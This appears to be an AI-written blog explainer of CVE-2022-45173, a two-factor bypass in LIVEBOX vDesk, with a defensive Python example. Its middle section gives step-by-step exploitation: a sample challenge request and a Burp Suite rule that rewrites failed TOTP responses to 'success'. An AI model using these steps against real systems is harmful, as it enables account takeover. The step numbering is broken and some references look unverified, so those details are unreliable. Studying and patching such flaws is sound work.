In late 2022, a critical vulnerability was discovered in the LIVEBOX Collaboration vDesk product (through version v018), tracked as CVE-2022-45173. This flaw exposes weak points in the application's implementation of two-factor authentication (2FA) and allows attackers to bypass it—rendering 2FA protections useless.
Let’s break down what this bug is, how you can exploit it, and why it’s such a big deal for organizations relying on vDesk.
What is CVE-2022-45173?
LIVEBOX Collaboration vDesk is a workplace collaboration platform. One security feature it offers is two-factor authentication, typically using Time-Based One-Time Passwords (TOTP). In theory, when a user logs in, the client sends the TOTP code to the server, which verifies it and responds according to whether the code is valid.
But in vDesk, a logic flaw exists:
The /api/v1/vdeskintegration/challenge endpoint doesn't actually enforce the TOTP check on the server side. Instead, the server returns a response, and it is left up to the client (the user's browser) to decide whether the authentication is valid or not.
In other words: You can tell the app you passed 2FA, even if you failed!
2. 2FA Prompt: User is asked for a TOTP code.
3. Code Sent: The browser/app sends the TOTP code to /api/v1/vdeskintegration/challenge.
4. Response Tamper: Instead of waiting for a real server check, the client just looks at the API response.
5. Bypass: An attacker can intercept the network traffic (using tools like Burp Suite or browser dev tools), and modify the response from the server to make it look like the check succeeded—regardless of the actual TOTP entered!
The client will send something like:
POST /api/v1/vdeskintegration/challenge HTTP/1.1
Host: vdesk-victim.com
Content-Type: application/json
{
"username": "victim",
"totp": "123456"
}
If the TOTP is incorrect, the server might say:
{"status": "failed", "message": "Invalid code"}
But here’s the issue: the result is not enforced by the backend!
Using a proxy like Burp Suite, simply modify the response on the fly to:
{"status": "success", "message": "TOTP verified"}
5. Observe the Bypass
The frontend reads your *faked* "success" status and logs you into the victim's account—2FA defeated! The only thing needed is access to the login credentials, or the ability to brute-force/steal them.
Match/replace rule:
- Match: URL /api/v1/vdeskintegration/challenge
- Replace with: "status":"success"
Now, *every* TOTP challenge will look like it’s been passed—no matter what code you enter!
References
- MITRE CVE: CVE-2022-45173
- Exploit Database: EDB-ID 51309 (if available)
- Vendor Advisory: LIVEBOX Security Page
- Disclosure Discussion: huntr.dev Advisory
Why Does This Happen?
TL;DR: The client (browser/user-side) code is trusted to verify security checks, instead of a robust server-side check.
- Check your version: Admins should immediately audit for vulnerable versions.
- Web app design tip: Always do credential and TOTP checks on the server, and only ever trust the backend’s determinations for access control.
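To make the design tip concrete, here is an added example (not vDesk's code) of the two patterns side by side: a challenge endpoint that records the TOTP verdict in server-held session state, a protected handler that consults only that state, and, for contrast, a handler that trusts the client's copy of the challenge response the way the flaw describes. The user name, TOTP secret and session store are constructed demo data; the TOTP routine follows RFC 6238 using only the standard library.

```python
import hashlib
import hmac
import secrets
import struct
import time

# Constructed demo data: one user with an assumed TOTP secret, sessions kept server-side.
USERS = {"victim": {"totp_secret": b"constructed-demo-secret"}}
SESSIONS = {}

def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HMAC-SHA1 over the time counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", now // step), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"

def password_login(username: str) -> str:
    """First factor (password check assumed done). Session starts with MFA unverified."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": username, "mfa_verified": False}
    return sid

def challenge(sid: str, code: str, now=None) -> dict:
    """Hardened /challenge: the verdict is recorded in server-side session state."""
    session = SESSIONS.get(sid)
    if session is None:
        return {"status": "failed", "message": "No session"}
    now = int(time.time()) if now is None else now
    secret = USERS[session["user"]]["totp_secret"]
    # Accept one step of clock skew either way; constant-time compare per candidate.
    valid = any(hmac.compare_digest(totp(secret, now + d * 30), code) for d in (-1, 0, 1))
    if valid:
        session["mfa_verified"] = True
        return {"status": "success", "message": "TOTP verified"}
    return {"status": "failed", "message": "Invalid code"}

def protected_resource(sid: str, client_claim: dict = None) -> int:
    """Hardened: only server state decides; the client's (possibly tampered) JSON is ignored."""
    session = SESSIONS.get(sid)
    if session is None or not session["mfa_verified"]:
        return 403
    return 200

def protected_resource_vulnerable(sid: str, client_claim: dict) -> int:
    """The vDesk-style flaw: trusting the client's copy of the challenge response."""
    if sid in SESSIONS and client_claim.get("status") == "success":
        return 200
    return 403
```

A tampered "success" response changes nothing in SESSIONS, so the hardened handler still returns 403 until the server itself has seen a valid code.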
Conclusion
CVE-2022-45173 is an example of how even the best security features, like two-factor authentication, are useless if improperly implemented. Attackers could exploit this to gain unauthorized full access in LIVEBOX Collaboration vDesk, leaving data and communication wide open.
Admins should patch ASAP, and every developer should remember: *Critical security checks belong on the server, not the client*.
*Exclusive analysis by ChatGPT. For educational and awareness purposes only. Follow responsible disclosure processes!*
Timeline
Published on: 04/14/2023 14:15:00 UTC
Last modified on: 04/19/2023 19:28:00 UTC